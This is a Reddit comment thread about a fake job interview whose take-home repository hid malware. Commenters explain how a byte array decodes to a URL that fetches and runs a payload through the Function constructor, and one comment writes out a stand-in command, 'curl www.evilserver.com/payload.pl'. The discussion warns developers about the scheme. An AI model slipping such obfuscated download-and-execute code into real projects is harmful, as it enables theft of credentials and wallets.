How I Almost Got Hacked By A 'Job Interview'
Posted by rchaudhary@reddit | programming | View on Reddit | 37 comments
Posted by rchaudhary@reddit | programming | View on Reddit | 37 comments
Ameisen@reddit
Looked at some other posts, after noticing the rather blatant LLM prompt plug... saw this:
LLMs are not team members. They cannot think. They cannot reason.
gomihako_@reddit
You haven't met my team members...
ShinyHappyREM@reddit
It doesn't feel pity, or remorse, or fear. And it absolutely will not stop, ever!
FormerlyGruntled@reddit
Inexperienced team members can learn. LLMs will only spit out a different combination of words without knowledge of if it actually would work.
MostCredibleDude@reddit
The infuriating thing is when your boss demands AI usage, calls it like an army of junior devs, but guess what! You're responsible for your junior devs' code quality as if you did it yourself!
All the fake benefits of fake junior devs but nobody is allowed to blame the AI when it puts out garbage. And my output suffers because my blameless fake junior devs suck at their jobs.
no_brains101@reddit
I agree with this part of the comment at least? They are not magic this is true.
8J-QgvCfkqllcg@reddit
Alternate title: How I Missed Numerous Red Flags From A Fake Recruiter
kaddkaka@reddit
Which ones?
a_random_username@reddit
NineThreeFour1@reddit
I stopped reading right there.
OP is also an AI slob article spammer.
chat-lu@reddit
“Chief Blockchain Officer”
Globbi@reddit
...but he had inspirational quotes!
Akeshi@reddit
I hate this writing style, the only way I can think of describing it is "overconfidence"
mareek@reddit
How can anyone ignore those red flags ?
BlueGoliath@reddit
It was the raccoon wasn't it?
Ameisen@reddit
That raccoon powers all LLMs.
techno156@reddit
The R in RAG stands for Raccoon.
BlueGoliath@reddit
Silent Hill dog ending but IRL and racoons.
dethswatch@reddit
you think they don't have thumbs, but they do!
TonyCanHelp@reddit
This shady scam has been going for a while: https://medium.com/@pedro.domingues.pt/how-i-almost-got-hacked-by-a-linkedin-recruiter-40c466425e8a
qwaai@reddit
What?
Is this a web dev thing? I've never been asked to download and run stuff from a repo on my own system.
luxfx@reddit
Yep, very common. I've had some that were a shared VSCode session, some through web based repls, and some live. But a lot were of the "have this done before our call tomorrow" variety where you're supposed to fork a prepared repo and work off that. So the natural behavior is just treat it like any other project, download it into your projects folder, and work on it locally.
I wish I could say I would have caught this in time. But there's a very good chance I would have fallen for this. It's very sneaky.
ptoki@reddit
Thats just shows how immature webdev is. I would never ask anyone to use their resources at the interview. I always provided my own platform and either get the guy rdp and watch his work or give them control to my interview box (wiped clean after the session) over teams.
I learn every day how stupid webdev is and I am discovering that the bottom is not the actual bottom...
vnordnet@reddit
Or maybe some people actually prefer take-homes? I’m a backend guy and I love them, because I get to show how I usually work and deliver on my own terms with low stress.
HoushouCoder@reddit
Ironically somewhat common in cybersecurity roles, in the form of bug bounties, or cracking challenges
SquirrelOtherwise723@reddit
It seems the most targets libraries are from nodejs.
deanrihpee@reddit
i don't know, I'm web-deb adjacent, and yet my take home assignment is I write it myself, commit, push and submit to the employer, not the other way around, the closest thing to be downloaded is probably a requirement or description documents in pdf, but even then i just open through Gmail client, not download it
Shogobg@reddit
Not web dev only - I’ve had “take-home” tests to work on a sample project for various positions.
badiparmagi@reddit
How come that script with byte array stoled everything on your pc like password, wallets etc? Please eli5
YetAnotherRobert@reddit
If your script has "curl www.evilserver.com/payload.pl", it would catch your eye. If you use the numbers for 'w' and 'e' and 'v' and so on, it's less likely to catch your eye when scanning.
So next time. someone just puts those numbers into [ evil idea censored ] so it doesn't even catch your attention as a byte array - which also is a pretty rare thing to see in source so it DOES stand out anyway, but not as literally as the full sketchy domain + URL that's in the article's text.
Gotta admit, it's clever.
IAm_A_Complete_Idiot@reddit
The code takes the binary representation of a string, in utf-8. It then:
Functionconstructor to create a function that holds all the code in that file.In the same way:
would evaluate to 7
would evaluate the code at
malware.org.YouSuffer@reddit
The byte array is decoded into a URL. Then the code downloads whatever's at that address and runs it. The downloaded malware is what goes through the user's PC and steals anything it can find.
fatoms@reddit
So they just breezed right past the obvious red flag "transforming real estate with blockchain". Bringing two scam infested industries together to spread the "love".
-nbsp-@reddit
Thanks for sharing. This is a campaign conducted by North Korean state sponsored hackers. The campaign is called Contagious Interview campaign. I really appreciate the author sharing the steps leading to the coding "task".
This has been going on for more than a year now. Large scale. Individual developers targeted at a time. There have been a few posts on reddit about it too!
Lots of security companies have released info on it in the past year but Socket just dropped a thesis:
https://socket.dev/blog/north-korea-contagious-interview-campaign-338-malicious-npm-packages
Carnifex@reddit
Do we? Looks like ai to me
Gipetto@reddit
What timing. I got this beauty today in my spam folder:
I never applied with them, but I’ve been sending out a ton of resumes, so maybe. But install your CRM? Nah, I’ll pass on the malware…
levelstar01@reddit
I am not reading something written in LinkedIn Standard English